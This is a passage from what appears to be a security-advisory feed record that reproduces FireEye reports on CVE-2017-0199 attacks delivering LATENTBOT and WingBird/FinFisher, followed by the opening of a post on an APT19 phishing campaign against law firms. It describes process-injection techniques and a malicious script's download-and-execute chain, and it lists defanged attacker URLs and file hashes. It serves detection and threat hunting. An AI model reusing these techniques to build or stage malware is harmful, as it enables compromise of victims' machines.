version of the [LATENTBOT malware family](<https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html>). LATENTBOT is a highly-obfuscated BOT that has been in the wild since 2013.\n\nThe newer version of the LATENTBOT has different injection mechanisms for Windows XP (x86) and Windows 7 operating systems:\n\n * **Attrib.exe patching** \u2013 The bot calls Attrib.exe, patches the entry in memory, and inserts a JMP instruction to transfer control to the mapped section. To map the section in the address space of atrrib.exe it uses ZwMapViewOfSection().****\n * **Svchost code Injection** \u2013 Attrib.exe starts the svchost.exe process in suspended mode, creates space, and allocates code by calling ZwMapViewOfSection().\n * **Control transfer** \u2013 It then uses SetThreadContext() to modify the OEP of the primary thread, which will be executed in the remote process to trigger code execution.\n * **Browser injection** \u2013 A similar process is used to inject the final payload into the default web browser with the help of NtMapVIewOfSection().\n\nIn Windows 7 or later operating systems, the bot does not use attrib.exe. Rather, it injects code into svchost.exe followed by launching the default browser with malicious payload by leveraging NtMapViewOfSection().\n\nThis variant then connects to the following command and control (C2) server:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Code1.png)\n\nUpon successful communication with the C2 server, LATENTBOT generates a beacon. One of the decrypted beacons are as follows with an updated version number of 5015:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Code2.png)\n\nAt the time of analysis, the C2 server was offline. The bot comes with a highly modular plugin architecture and has been associated with the \u201cPony\u201d campaigns as an infostealer.\n\nAs of April 10, 2017, the malware hosted at www.modani[.]com/media/wysiwyg/wood.exe has been updated and the C2 server has been moved to: 217.12.203[.]100.\n\n#### Document 2 - (MD5: C10DABB05A38EDD8A9A0DDDA1C9AF10E)\n\nThe second malicious document identified by FireEye consisted of two malicious stages. The initial stage reached out to the following URL to download the stage one malicious HTA file:\n\nhttp[:]//95.141.38[.]110/mo/dnr/tmp/template.doc\n\nThis file is downloaded into the user\u2019s temporary internet files directory with the name template[?].hta, where [?] is determined at runtime. Once downloaded, winword.exe utilizes mshta.exe to parse the file. mshta.exe parses through file finding <script> </script> tags and executes the contained script. Figure 6 shows the deobfuscated script.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Fig6.png)\n\nFigure 6: Second document, first stage VBScript\n\nFigure 6 shows the following malicious actions:\n\n 1. Terminate the winword.exe process with taskkill.exe to hide the prompt shown in Figure 1\n 2. Download an executable from http[:]//95.141.38[.]110/mo/dnr/copy.jpg, saving it to '%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\winword.exe'\n 3. Download a document from http[:]//95.141.38[.]110/mo/dnr/docu.doc, saving it to %temp%\\document.doc\n 4. Clean up the Word Resiliency keys for Word versions 15.0 and 16.0, so that Microsoft Word will restart normally\n 5. Execute the malicious payload at '%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\winword.exe'\n 6. Open the decoy document, %temp%\\document.doc, to hide the malicious activity from the user\n\nExamination of the malicious payload revealed that it is a variant of the dropper for what Microsoft calls [WingBird](<http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf>), which has similar characteristics as FinFisher. The malware is heavily obfuscated with several anti-analysis measures, including a custom VM to slow analysis. A [blog post by \"Artem\"](<https://artemonsecurity.blogspot.com/2017/01/wingbird-rootkit-analysis.html>) covers a payload driver of WingBird. The blog author briefly mentions the protection techniques of the dropper, which match this sample.\n\nMD5\n\n| \n\nSize\n\n| \n\nName\n\n| \n\nDescription \n \n---|---|---|--- \n \nc10dabb05a38edd8a9a0ddda1c9af10e\n\n| \n\n70,269\n\n| \n\n\u0421\u041f\u0423\u0422\u041d\u0418\u041a \u0420\u0410\u0417\u0412\u0415\u0414\u0427\u0418\u041a\u0410.doc\n\n| \n\nMalicious document \n \n9dec125f006f787a3f8ad464d480eed1\n\n| \n\n27,500\n\n| \n\ntemplate.doc\n\n| \n\nMalicious HTA file \n \nacde6fb59ed431000107c8e8ca1b7266\n\n| \n\n1,312,768\n\n| \n\ncopy.jpg/winword.exe\n\n| \n\nFinal payload \n \ne01982913fbc22188b83f5f9fadc1c17\n\n| \n\n6,220,783\n\n| \n\ndocu.doc/document.doc\n\n| \n\nDecoy document \n \nTable 2: Second document metadata\n\n#### Conclusion\n\nFireEye observed CVE-2017-0199, a vulnerability in Microsoft Word that allows an attacker to execute a malicious Visual Basic script. The CVE-2017-0199 vulnerability is a logic bug and bypasses most mitigations. Upon execution of the malicious script, it downloads and executes malicious payloads, as well as displays decoy documents to the user. The two documents achieve execution of their malicious payloads, with one containing LATENTBOT and the other containing WingBird/FinFisher. The malicious document contained only a link to the attacker controlled server, showing the advantage of FireEye\u2019s MVX engine to detect multi-stage attacks. Further campaigns leveraging this attack have been observed prior to patch availability, but are not covered in this blog.\n\nWe recommend that Microsoft Office users apply the [patch](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>) as soon as possible.\n\n#### Acknowledgement\n\nThank you to Michael Matonis, Dhanesh Kizhakkinan, Yogesh Londhe, Swapnil Patil, Joshua Triplett, and Tyler Dean from FLARE Team, FireEye Labs Team, and FireEye iSIGHT Intelligence for their contributions to this blog. Thank you as well to everyone who worked with us at the Microsoft Security Response Center (MSRC).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-11T13:30:00", "type": "fireeye", "title": "CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2017-04-11T13:30:00", "id": "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED", "href": "https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-29T20:20:00", "description": "#### Summary\n\nIn May and June 2017, FireEye observed a phishing campaign targeting at least seven global law and investment firms. We have associated this campaign with APT19, a group that we assess is composed of freelancers, with some degree of sponsorship by the Chinese government.\n\nAPT19 used three different techniques to attempt to compromise targets. In early May, the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in [CVE 2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>). Toward the end of May, APT19 switched to using macro-enabled Microsoft Excel (XLSM) documents. In the most recent versions, APT19 added an application whitelisting bypass to the XLSM documents. At least one observed phishing lure delivered a Cobalt Strike payload.\n\nAs of the writing of this blog post, FireEye had not observed post-exploitation activity by the threat actors, so we cannot assess the goal of the campaign. We have previously observed APT19 steal data from law and investment firms for competitive economic purposes.\n\nThis purpose of this blog post is to inform law firms and investment firms of this phishing campaign and provide technical indicators that their IT personnel can use for proactive hunting and detection.\n\n#### The Emails\n\nAPT19 phishing emails from this campaign originated from sender email accounts from the \"@cloudsend[.]net\" domain and used a variety of subjects and attachment names. Refer to the Indicators of Compromise section for more details.\n\n#### The Attachments\n\nAPT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel (XLSM) files to deliver their initial exploits. The following sections describe the two methods in further detail.\n\n##### RTF Attachments\n\nThrough the exploitation of the HTA handler vulnerability described in [CVE-2017-1099](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>), the observed RTF attachments download hxxp://tk-in-f156.2bunny[.]com/Agreement.doc. Unfortunately, this file was no longer hosted at tk-in-f156.2bunny[.]com for further analysis. Figure 1 is a screenshot of a packet capture showing one of the RTF files reaching out to hxxp://tk-in-f156.2bunny[.]com/Agreement.doc.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Lawyer%20phishing/Fig1.png)Figure 1: RTF PCAP\n\n##### XLSM Attachments\n\nThe XLSM attachments contained multiple worksheets with content that reflected the attachment name. The attachments also contained an image that requested the user to \u201cEna